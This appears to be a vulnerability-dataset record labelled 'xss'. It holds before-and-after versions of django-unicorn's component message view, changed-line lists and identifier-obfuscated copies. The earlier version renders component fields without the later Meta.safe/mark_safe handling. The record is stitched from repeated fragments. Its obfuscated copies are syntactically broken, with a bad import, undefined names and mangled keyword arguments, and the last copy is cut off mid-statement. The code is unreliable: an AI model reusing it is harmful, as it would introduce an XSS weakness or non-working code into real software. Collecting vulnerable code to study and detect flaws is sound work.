# Get a deepcopy of the data passed in to determine what fields are updated later
original_data = copy.deepcopy(component_request.data)
# Set component properties based on request data
for (property_name, property_value) in component_request.data.items():
set_property_from_data(component, property_name, property_value)
component.hydrate()
validate_all_fields = False
is_reset_called = False
is_refresh_called = False
return_data = None
partials = []
for action in component_request.action_queue:
if action.partial:
partials.append(action.partial)
else:
partials = action.partials
if action.action_type == "syncInput":
sync_input.handle(component_request, component, action.payload)
elif action.action_type == "callMethod":
(
component,
_is_refresh_called,
_is_reset_called,
_validate_all_fields,
return_data,
) = call_method.handle(component_request, component, action.payload)
is_refresh_called = is_refresh_called | _is_refresh_called
is_reset_called = is_reset_called | _is_reset_called
validate_all_fields = validate_all_fields | _validate_all_fields
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
component.complete()
# Re-load frontend context variables to deal with non-serializable properties
component_request.data = orjson.loads(component.get_frontend_context_variables())
# Send back all available data for reset or refresh actions
updated_data = component_request.data
if not is_reset_called:
if not is_refresh_called:
updated_data = {}
for key, value in original_data.items():
if value != component_request.data.get(key):
updated_data[key] = component_request.data.get(key)
if validate_all_fields:
component.validate()
else:
component.validate(model_names=list(updated_data.keys()))
rendered_component = component.render()
component.rendered(rendered_component)
cache = caches[get_cache_alias()]
try:
cache.set(component.component_cache_key, get_cacheable_component(component))
except UnicornCacheError as e:
logger.warning(e)
partial_doms = []
if partials and all(partials):
soup = BeautifulSoup(rendered_component, features="html.parser")
for partial in partials:
partial_found = False
only_id = False
only_key = False
target = partial.get("target")
if not target:
target = partial.get("key")
if target:
only_key = True
if not target:
target = partial.get("id")
if target:
only_id = True
assert target, "Partial target is required"
if not only_id:
for element in soup.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == target
):
partial_doms.append({"key": target, "dom": str(element)})
partial_found = True
break
if not partial_found and not only_key:
for element in soup.find_all():
if "id" in element.attrs and element.attrs["id"] == target:
partial_doms.append({"id": target, "dom": str(element)})
partial_found = True
break
res = {
"id": component_request.id,
"data": updated_data,
"errors": component.errors,
"calls": component.calls,
"checksum": generate_checksum(orjson.dumps(component_request.data)),
}
if partial_doms:
res.update({"partials": partial_doms})
else:
hash = generate_checksum(rendered_component)
if (
component_request.hash == hash
and (not return_data or not return_data.value)
and not component.calls
):
raise RenderNotModified()
# Make sure that partials with comments or blank lines before the root element only return the root element
soup = BeautifulSoup(rendered_component, features="html.parser")
rendered_component = str(get_root_element(soup))
res.update(
{"dom": rendered_component, "hash": hash,}
)
if return_data:
res.update(
{"return": return_data.get_data(),}
)
if return_data.redirect:
res.update(
{"redirect": return_data.redirect,}
)
if return_data.poll:
res.update(
{"poll": return_data.poll,}
)
parent_component = component.parent
if parent_component:
# TODO: Should parent_component.hydrate() be called?
parent_frontend_context_variables = loads(
parent_component.get_frontend_context_variables()
)
parent_checksum = generate_checksum(dumps(parent_frontend_context_variables))
parent = {
"id": parent_component.component_id,
"checksum": parent_checksum,
}
if not partial_doms:
parent_dom = parent_component.render()
component.parent_rendered(parent_dom)
try:
cache.set(
parent_component.component_cache_key,
get_cacheable_component(parent_component),
)
except UnicornCacheError as e:
logger.warning(e)
parent.update(
{
"dom": parent_dom,
"data": parent_frontend_context_variables,
"errors": parent_component.errors,
}
)
res.update({"parent": parent})
return res
def _handle_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest` by adding it to the cache and then either:
- processing all of the component requests in the cache and returning the resulting value if
it is the first component request for that particular component name + component id combination
- return a `dict` saying that the request has been queued
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
# If serial isn't enabled or the wrong cache, just process the request like normal
if not get_serial_enabled():
return _process_component_request(request, component_request)
cache = caches[get_cache_alias()]
# Add the current request `ComponentRequest` to the cache
queue_cache_key = f"unicorn:queue:{component_request.id}"
component_requests = cache.get(queue_cache_key) or []
# Remove `request` from `ComponentRequest` before caching because it is not pickleable
component_request.request = None
component_requests.append(component_request)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if len(component_requests) > 1:
original_epoch = component_requests[0].epoch
return {
"queued": True,
"epoch": component_request.epoch,
"original_epoch": original_epoch,
}
return _handle_queued_component_requests(
request, component_request.name, queue_cache_key
)
def _handle_queued_component_requests(
request: HttpRequest, component_name: str, queue_cache_key
) -> Dict:
"""
Process the current component requests that are stored in cache.
Also recursively checks for new requests that might have happened
while executing the first request, merges them together and returns
the correct appropriate data.
Args:
param request: HttpRequest for the view.
param: component_name: Name of the component, e.g. "hello-world".
param: queue_cache_key: Cache key created from component id which should be unique
for any particular user's request lifecycle.
Returns:
JSON with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
cache = caches[get_cache_alias()]
# Handle current request and any others in the cache by first sorting all of the current requests by ascending order
component_requests = cache.get(queue_cache_key)
if not component_requests or not isinstance(component_requests, list):
raise UnicornViewError(f"No request found for {queue_cache_key}")
component_requests = sorted(component_requests, key=lambda r: r.epoch)
first_component_request = component_requests[0]
try:
# Can't store request on a `ComponentRequest` and cache it because `HttpRequest` isn't pickleable
first_json_result = _process_component_request(request, first_component_request)
except RenderNotModified:
# Catching this and re-raising, but need the finally clause to clear the cache
raise
finally:
# Re-check for requests after the first request is processed
component_requests = cache.get(queue_cache_key)
# Check that the request is in the cache before popping it off
if component_requests:
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if component_requests:
# Create one new `component_request` from all of the queued requests that can be processed
merged_component_request = None
for additional_component_request in copy.deepcopy(component_requests):
if merged_component_request:
# Add new component request action queue to the merged component request
merged_component_request.action_queue.extend(
additional_component_request.action_queue
)
# Originally, the thought was to merge the `additional_component_request.data` into
# the `merged_component_request.data`, but I can't figure out a way to do that in a sane
# manner. This means that for rapidly fired events that mutate `data`, that new
# `data` with be "thrown away".
# Relevant test: test_call_method_multiple.py::test_message_call_method_multiple_with_updated_data
else:
merged_component_request = additional_component_request
# Set new component request data from the first component request's resulting data
for key, val in first_json_result.get("data", {}).items():
merged_component_request.data[key] = val
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
merged_json_result = _handle_component_request(
request, merged_component_request
)
return merged_json_result
return first_json_result
@timed
@handle_error
@csrf_protect
@require_POST
def message(request: HttpRequest, component_name: str = None) -> JsonResponse:
"""
Endpoint that instantiates the component and does the correct action
(set an attribute or call a method) depending on the JSON payload in the body.
Args:
param request: HttpRequest for the function-based view.
param: component_name: Name of the component, e.g. "hello-world".
Returns:
`JsonRequest` with the following structure in the body:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
assert component_name, "Missing component name in url"
component_request = ComponentRequest(request, component_name)
json_result = _handle_component_request(request, component_request)
return JsonResponse(json_result)
| import copy
import logging
from functools import wraps
from typing import Dict, Sequence
from django.core.cache import caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def handle_error(view_func):
"""
Returns a JSON response with an error if necessary.
"""
def wrapped_view(*args, **kwargs):
try:
return view_func(*args, **kwargs)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(view_func)(wrapped_view)
def _process_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest`:
1. construct a Component view
2. set all of the properties on the view from the data
3. execute the type
- update the properties based on the payload for "syncInput"
- call the method specified for "callMethod"
4. validate any fields specified in a Django form
5. construct a `dict` that will get returned in a `JsonResponse` later on
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
component = UnicornView.create(
component_id=component_request.id,
component_name=component_request.name,
request=request,
)
# Get a deepcopy of the data passed in to determine what fields are updated later
original_data = copy.deepcopy(component_request.data)
# Set component properties based on request data
for (property_name, property_value) in component_request.data.items():
set_property_from_data(component, property_name, property_value)
component.hydrate()
validate_all_fields = False
is_reset_called = False
is_refresh_called = False
return_data = None
partials = []
for action in component_request.action_queue:
if action.partial:
partials.append(action.partial)
else:
partials = action.partials
if action.action_type == "syncInput":
sync_input.handle(component_request, component, action.payload)
elif action.action_type == "callMethod":
(
component,
_is_refresh_called,
_is_reset_called,
_validate_all_fields,
return_data,
) = call_method.handle(component_request, component, action.payload)
is_refresh_called = is_refresh_called | _is_refresh_called
is_reset_called = is_reset_called | _is_reset_called
validate_all_fields = validate_all_fields | _validate_all_fields
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
component.complete()
# Re-load frontend context variables to deal with non-serializable properties
component_request.data = orjson.loads(component.get_frontend_context_variables())
# Get set of attributes that should be marked as `safe`
safe_fields = []
if hasattr(component, "Meta") and hasattr(component.Meta, "safe"):
if isinstance(component.Meta.safe, Sequence):
for field_name in component.Meta.safe:
if field_name in component._attributes().keys():
safe_fields.append(field_name)
# Mark safe attributes as such before rendering
for field_name in safe_fields:
value = getattr(component, field_name)
if isinstance(value, str):
setattr(component, field_name, mark_safe(value))
# Send back all available data for reset or refresh actions
updated_data = component_request.data
if not is_reset_called:
if not is_refresh_called:
updated_data = {}
for key, value in original_data.items():
if value != component_request.data.get(key):
updated_data[key] = component_request.data.get(key)
if validate_all_fields:
component.validate()
else:
component.validate(model_names=list(updated_data.keys()))
rendered_component = component.render()
component.rendered(rendered_component)
cache = caches[get_cache_alias()]
try:
cache.set(component.component_cache_key, get_cacheable_component(component))
except UnicornCacheError as e:
logger.warning(e)
partial_doms = []
if partials and all(partials):
soup = BeautifulSoup(rendered_component, features="html.parser")
for partial in partials:
partial_found = False
only_id = False
only_key = False
target = partial.get("target")
if not target:
target = partial.get("key")
if target:
only_key = True
if not target:
target = partial.get("id")
if target:
only_id = True
assert target, "Partial target is required"
if not only_id:
for element in soup.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == target
):
partial_doms.append({"key": target, "dom": str(element)})
partial_found = True
break
if not partial_found and not only_key:
for element in soup.find_all():
if "id" in element.attrs and element.attrs["id"] == target:
partial_doms.append({"id": target, "dom": str(element)})
partial_found = True
break
res = {
"id": component_request.id,
"data": updated_data,
"errors": component.errors,
"calls": component.calls,
"checksum": generate_checksum(orjson.dumps(component_request.data)),
}
if partial_doms:
res.update({"partials": partial_doms})
else:
hash = generate_checksum(rendered_component)
if (
component_request.hash == hash
and (not return_data or not return_data.value)
and not component.calls
):
raise RenderNotModified()
# Make sure that partials with comments or blank lines before the root element only return the root element
soup = BeautifulSoup(rendered_component, features="html.parser")
rendered_component = str(get_root_element(soup))
res.update(
{"dom": rendered_component, "hash": hash,}
)
if return_data:
res.update(
{"return": return_data.get_data(),}
)
if return_data.redirect:
res.update(
{"redirect": return_data.redirect,}
)
if return_data.poll:
res.update(
{"poll": return_data.poll,}
)
parent_component = component.parent
if parent_component:
# TODO: Should parent_component.hydrate() be called?
parent_frontend_context_variables = loads(
parent_component.get_frontend_context_variables()
)
parent_checksum = generate_checksum(dumps(parent_frontend_context_variables))
parent = {
"id": parent_component.component_id,
"checksum": parent_checksum,
}
if not partial_doms:
parent_dom = parent_component.render()
component.parent_rendered(parent_dom)
try:
cache.set(
parent_component.component_cache_key,
get_cacheable_component(parent_component),
)
except UnicornCacheError as e:
logger.warning(e)
parent.update(
{
"dom": parent_dom,
"data": parent_frontend_context_variables,
"errors": parent_component.errors,
}
)
res.update({"parent": parent})
return res
def _handle_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest` by adding it to the cache and then either:
- processing all of the component requests in the cache and returning the resulting value if
it is the first component request for that particular component name + component id combination
- return a `dict` saying that the request has been queued
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
# If serial isn't enabled or the wrong cache, just process the request like normal
if not get_serial_enabled():
return _process_component_request(request, component_request)
cache = caches[get_cache_alias()]
# Add the current request `ComponentRequest` to the cache
queue_cache_key = f"unicorn:queue:{component_request.id}"
component_requests = cache.get(queue_cache_key) or []
# Remove `request` from `ComponentRequest` before caching because it is not pickleable
component_request.request = None
component_requests.append(component_request)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if len(component_requests) > 1:
original_epoch = component_requests[0].epoch
return {
"queued": True,
"epoch": component_request.epoch,
"original_epoch": original_epoch,
}
return _handle_queued_component_requests(
request, component_request.name, queue_cache_key
)
def _handle_queued_component_requests(
    request: HttpRequest, component_name: str, queue_cache_key: str
) -> Dict:
    """
    Process the current component requests that are stored in cache.
    Also recursively checks for new requests that might have happened
    while executing the first request, merges them together and returns
    the correct appropriate data.

    Args:
        param request: HttpRequest for the view.
        param: component_name: Name of the component, e.g. "hello-world".
        param: component_name: Name of the component, unused here but kept for the caller's signature.
        param: queue_cache_key: Cache key created from component id which should be unique
            for any particular user's request lifecycle.

    Returns:
        JSON with the following structure:
        {
            "id": component_id,
            "dom": html, // re-rendered version of the component after actions in the payload are completed
            "data": {}, // updated data after actions in the payload are completed
            "errors": {}, // form validation errors
            "return": {}, // optional return value from an executed action
            "parent": {}, // optional representation of the parent component
        }

    Raises:
        UnicornViewError: when no queued requests exist under `queue_cache_key`.
        RenderNotModified: re-raised from processing (after cleaning the queue).
    """
    cache = caches[get_cache_alias()]

    # Handle current request and any others in the cache by first sorting all of the current requests by ascending order
    component_requests = cache.get(queue_cache_key)

    if not component_requests or not isinstance(component_requests, list):
        raise UnicornViewError(f"No request found for {queue_cache_key}")

    # Oldest request (smallest epoch) is processed first.
    component_requests = sorted(component_requests, key=lambda r: r.epoch)
    first_component_request = component_requests[0]

    try:
        # Can't store request on a `ComponentRequest` and cache it because `HttpRequest` isn't pickleable
        first_json_result = _process_component_request(request, first_component_request)
    except RenderNotModified:
        # Catching this and re-raising, but need the finally clause to clear the cache
        raise
    finally:
        # Re-check for requests after the first request is processed; new ones
        # may have been appended to the cached queue while processing ran.
        component_requests = cache.get(queue_cache_key)

        # Check that the request is in the cache before popping it off
        if component_requests:
            # Drop the request that was just processed from the head of the queue.
            component_requests.pop(0)
            cache.set(
                queue_cache_key, component_requests, timeout=get_serial_timeout(),
            )

    if component_requests:
        # Create one new `component_request` from all of the queued requests that can be processed
        merged_component_request = None

        # Deep-copy so mutations below don't alias the cached objects.
        for additional_component_request in copy.deepcopy(component_requests):
            if merged_component_request:
                # Add new component request action queue to the merged component request
                merged_component_request.action_queue.extend(
                    additional_component_request.action_queue
                )

                # Originally, the thought was to merge the `additional_component_request.data` into
                # the `merged_component_request.data`, but I can't figure out a way to do that in a sane
                # manner. This means that for rapidly fired events that mutate `data`, that new
                # `data` with be "thrown away".
                # Relevant test: test_call_method_multiple.py::test_message_call_method_multiple_with_updated_data
            else:
                merged_component_request = additional_component_request

        # Set new component request data from the first component request's resulting data
        for key, val in first_json_result.get("data", {}).items():
            merged_component_request.data[key] = val

        # NOTE(review): only the head of the remaining queue is popped here even
        # though every remaining request was merged above; the merged request is
        # re-queued by the recursive call below — confirm the leftover cache
        # entries are intentionally kept.
        component_requests.pop(0)
        cache.set(
            queue_cache_key, component_requests, timeout=get_serial_timeout(),
        )

        # Recurse through the normal entry point so newly queued requests are
        # picked up again; its result supersedes `first_json_result`.
        merged_json_result = _handle_component_request(
            request, merged_component_request
        )

        return merged_json_result

    return first_json_result
@timed
@handle_error
@csrf_protect
@require_POST
def message(request: HttpRequest, component_name: str = None) -> JsonResponse:
    """
    POST endpoint that drives a component from a frontend message.

    The JSON payload in the request body describes the actions to run against
    the component (set an attribute or call a method); the component is then
    re-rendered and the outcome returned as JSON.

    Args:
        param request: HttpRequest for the function-based view.
        param: component_name: Name of the component, e.g. "hello-world".

    Returns:
        `JsonRequest` with the following structure in the body:
        {
            "id": component_id,
            "dom": html, // re-rendered version of the component after actions in the payload are completed
            "data": {}, // updated data after actions in the payload are completed
            "errors": {}, // form validation errors
            "return": {}, // optional return value from an executed action
            "parent": {}, // optional representation of the parent component
        }
    """
    # `handle_error` converts this `AssertionError` into a JSON error response.
    assert component_name, "Missing component name in url"

    component_request = ComponentRequest(request, component_name)
    response_payload = _handle_component_request(request, component_request)

    return JsonResponse(response_payload)
| xss | {
"code": [
"from typing import Dict"
],
"line_no": [
4
]
} | {
"code": [
"from typing import Dict, Sequence",
"from django.utils.safestring import mark_safe",
" if hasattr(component, \"Meta\") and hasattr(component.Meta, \"safe\"):",
" if isinstance(component.Meta.safe, Sequence):",
" for field_name in component.Meta.safe:",
" safe_fields.append(field_name)",
" value = getattr(component, field_name)",
" if isinstance(value, str):",
" setattr(component, field_name, mark_safe(value))"
],
"line_no": [
4,
9,
132,
133,
134,
136,
140,
141,
142
]
} | import copy
import logging
from functools import wraps
from typing import Dict
from django.core.cache import .caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
VAR_0 = logging.getLogger(__name__)
VAR_0.setLevel(logging.DEBUG)
def FUNC_0(VAR_1):
def FUNC_5(*VAR_6, **VAR_7):
try:
return VAR_1(*VAR_6, **VAR_7)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(VAR_1)(FUNC_5)
def FUNC_1(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
VAR_8 = UnicornView.create(
component_id=VAR_3.id,
VAR_4=VAR_3.name,
VAR_2=request,
)
VAR_9 = copy.deepcopy(VAR_3.data)
for (property_name, property_value) in VAR_3.data.items():
set_property_from_data(VAR_8, property_name, property_value)
VAR_8.hydrate()
VAR_10 = False
VAR_11 = False
VAR_12 = False
VAR_13 = None
VAR_14 = []
for action in VAR_3.action_queue:
if action.partial:
VAR_14.append(action.partial)
else:
VAR_14 = action.partials
if action.action_type == "syncInput":
sync_input.handle(VAR_3, VAR_8, action.payload)
elif action.action_type == "callMethod":
(
VAR_8,
VAR_38,
VAR_39,
VAR_40,
VAR_13,
) = call_method.handle(VAR_3, VAR_8, action.payload)
VAR_12 = is_refresh_called | VAR_38
VAR_11 = is_reset_called | VAR_39
VAR_10 = validate_all_fields | VAR_40
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
VAR_8.complete()
VAR_3.data = orjson.loads(VAR_8.get_frontend_context_variables())
VAR_15 = VAR_3.data
if not VAR_11:
if not VAR_12:
VAR_15 = {}
for VAR_41, value in VAR_9.items():
if value != VAR_3.data.get(VAR_41):
VAR_15[VAR_41] = VAR_3.data.get(VAR_41)
if VAR_10:
VAR_8.validate()
else:
VAR_8.validate(model_names=list(VAR_15.keys()))
VAR_16 = VAR_8.render()
VAR_8.rendered(VAR_16)
VAR_17 = caches[get_cache_alias()]
try:
VAR_17.set(VAR_8.component_cache_key, get_cacheable_component(VAR_8))
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_18 = []
if VAR_14 and all(VAR_14):
VAR_24 = BeautifulSoup(VAR_16, features="html.parser")
for partial in VAR_14:
VAR_33 = False
VAR_34 = False
VAR_35 = False
VAR_36 = partial.get("target")
if not VAR_36:
VAR_36 = partial.get("key")
if VAR_36:
VAR_35 = True
if not VAR_36:
VAR_36 = partial.get("id")
if VAR_36:
VAR_34 = True
assert VAR_36, "Partial VAR_36 is required"
if not VAR_34:
for element in VAR_24.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == VAR_36
):
VAR_18.append({"key": VAR_36, "dom": str(element)})
VAR_33 = True
break
if not VAR_33 and not VAR_35:
for element in VAR_24.find_all():
if "id" in element.attrs and element.attrs["id"] == VAR_36:
VAR_18.append({"id": VAR_36, "dom": str(element)})
VAR_33 = True
break
VAR_19 = {
"id": VAR_3.id,
"data": VAR_15,
"errors": VAR_8.errors,
"calls": VAR_8.calls,
"checksum": generate_checksum(orjson.dumps(VAR_3.data)),
}
if VAR_18:
VAR_19.update({"partials": VAR_18})
else:
VAR_25 = generate_checksum(VAR_16)
if (
VAR_3.hash == VAR_25
and (not VAR_13 or not VAR_13.value)
and not VAR_8.calls
):
raise RenderNotModified()
VAR_24 = BeautifulSoup(VAR_16, features="html.parser")
VAR_16 = str(get_root_element(VAR_24))
VAR_19.update(
{"dom": VAR_16, "hash": VAR_25,}
)
if VAR_13:
VAR_19.update(
{"return": VAR_13.get_data(),}
)
if VAR_13.redirect:
VAR_19.update(
{"redirect": VAR_13.redirect,}
)
if VAR_13.poll:
VAR_19.update(
{"poll": VAR_13.poll,}
)
VAR_20 = VAR_8.parent
if VAR_20:
VAR_26 = loads(
VAR_20.get_frontend_context_variables()
)
VAR_27 = generate_checksum(dumps(VAR_26))
VAR_28 = {
"id": VAR_20.component_id,
"checksum": VAR_27,
}
if not VAR_18:
VAR_37 = VAR_20.render()
VAR_8.parent_rendered(VAR_37)
try:
VAR_17.set(
VAR_20.component_cache_key,
get_cacheable_component(VAR_20),
)
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_28.update(
{
"dom": VAR_37,
"data": VAR_26,
"errors": VAR_20.errors,
}
)
VAR_19.update({"parent": VAR_28})
return VAR_19
def FUNC_2(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
if not get_serial_enabled():
return FUNC_1(VAR_2, VAR_3)
VAR_17 = caches[get_cache_alias()]
VAR_5 = f"unicorn:queue:{VAR_3.id}"
VAR_21 = VAR_17.get(VAR_5) or []
VAR_3.request = None
VAR_21.append(VAR_3)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
if len(VAR_21) > 1:
VAR_29 = VAR_21[0].epoch
return {
"queued": True,
"epoch": VAR_3.epoch,
"original_epoch": VAR_29,
}
return FUNC_3(
VAR_2, VAR_3.name, VAR_5
)
def FUNC_3(
VAR_2: HttpRequest, VAR_4: str, VAR_5
) -> Dict:
VAR_17 = caches[get_cache_alias()]
VAR_21 = VAR_17.get(VAR_5)
if not VAR_21 or not isinstance(VAR_21, list):
raise UnicornViewError(f"No VAR_2 found for {VAR_5}")
VAR_21 = sorted(VAR_21, VAR_41=lambda r: r.epoch)
VAR_22 = VAR_21[0]
try:
VAR_30 = FUNC_1(VAR_2, VAR_22)
except RenderNotModified:
raise
finally:
VAR_21 = VAR_17.get(VAR_5)
if VAR_21:
component_requests.pop(0)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
if VAR_21:
VAR_31 = None
for additional_component_request in copy.deepcopy(VAR_21):
if VAR_31:
VAR_31.action_queue.extend(
additional_component_request.action_queue
)
else:
VAR_31 = additional_component_request
for VAR_41, val in VAR_30.get("data", {}).items():
VAR_31.data[VAR_41] = val
VAR_21.pop(0)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
VAR_32 = FUNC_2(
VAR_2, VAR_31
)
return VAR_32
return VAR_30
@timed
@FUNC_0
@csrf_protect
@require_POST
def FUNC_4(VAR_2: HttpRequest, VAR_4: str = None) -> JsonResponse:
assert VAR_4, "Missing VAR_8 name in url"
VAR_3 = ComponentRequest(VAR_2, VAR_4)
VAR_23 = FUNC_2(VAR_2, VAR_3)
return JsonResponse(VAR_23)
| import copy
import logging
from functools import wraps
from typing import Dict, Sequence
from django.core.cache import .caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
VAR_0 = logging.getLogger(__name__)
VAR_0.setLevel(logging.DEBUG)
def FUNC_0(VAR_1):
def FUNC_5(*VAR_6, **VAR_7):
try:
return VAR_1(*VAR_6, **VAR_7)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(VAR_1)(FUNC_5)
def FUNC_1(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
VAR_8 = UnicornView.create(
component_id=VAR_3.id,
VAR_4=VAR_3.name,
VAR_2=request,
)
VAR_9 = copy.deepcopy(VAR_3.data)
for (property_name, property_value) in VAR_3.data.items():
set_property_from_data(VAR_8, property_name, property_value)
VAR_8.hydrate()
VAR_10 = False
VAR_11 = False
VAR_12 = False
VAR_13 = None
VAR_14 = []
for action in VAR_3.action_queue:
if action.partial:
VAR_14.append(action.partial)
else:
VAR_14 = action.partials
if action.action_type == "syncInput":
sync_input.handle(VAR_3, VAR_8, action.payload)
elif action.action_type == "callMethod":
(
VAR_8,
VAR_40,
VAR_41,
VAR_42,
VAR_13,
) = call_method.handle(VAR_3, VAR_8, action.payload)
VAR_12 = is_refresh_called | VAR_40
VAR_11 = is_reset_called | VAR_41
VAR_10 = validate_all_fields | VAR_42
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
VAR_8.complete()
VAR_3.data = orjson.loads(VAR_8.get_frontend_context_variables())
VAR_15 = []
if hasattr(VAR_8, "Meta") and hasattr(VAR_8.Meta, "safe"):
if isinstance(VAR_8.Meta.safe, Sequence):
for field_name in VAR_8.Meta.safe:
if field_name in VAR_8._attributes().keys():
VAR_15.append(field_name)
for field_name in VAR_15:
VAR_25 = getattr(VAR_8, field_name)
if isinstance(VAR_25, str):
setattr(VAR_8, field_name, mark_safe(VAR_25))
VAR_16 = VAR_3.data
if not VAR_11:
if not VAR_12:
VAR_16 = {}
for VAR_43, VAR_25 in VAR_9.items():
if VAR_25 != VAR_3.data.get(VAR_43):
VAR_16[VAR_43] = VAR_3.data.get(VAR_43)
if VAR_10:
VAR_8.validate()
else:
VAR_8.validate(model_names=list(VAR_16.keys()))
VAR_17 = VAR_8.render()
VAR_8.rendered(VAR_17)
VAR_18 = caches[get_cache_alias()]
try:
VAR_18.set(VAR_8.component_cache_key, get_cacheable_component(VAR_8))
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_19 = []
if VAR_14 and all(VAR_14):
VAR_26 = BeautifulSoup(VAR_17, features="html.parser")
for partial in VAR_14:
VAR_35 = False
VAR_36 = False
VAR_37 = False
VAR_38 = partial.get("target")
if not VAR_38:
VAR_38 = partial.get("key")
if VAR_38:
VAR_37 = True
if not VAR_38:
VAR_38 = partial.get("id")
if VAR_38:
VAR_36 = True
assert VAR_38, "Partial VAR_38 is required"
if not VAR_36:
for element in VAR_26.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == VAR_38
):
VAR_19.append({"key": VAR_38, "dom": str(element)})
VAR_35 = True
break
if not VAR_35 and not VAR_37:
for element in VAR_26.find_all():
if "id" in element.attrs and element.attrs["id"] == VAR_38:
VAR_19.append({"id": VAR_38, "dom": str(element)})
VAR_35 = True
break
VAR_20 = {
"id": VAR_3.id,
"data": VAR_16,
"errors": VAR_8.errors,
"calls": VAR_8.calls,
"checksum": generate_checksum(orjson.dumps(VAR_3.data)),
}
if VAR_19:
VAR_20.update({"partials": VAR_19})
else:
VAR_27 = generate_checksum(VAR_17)
if (
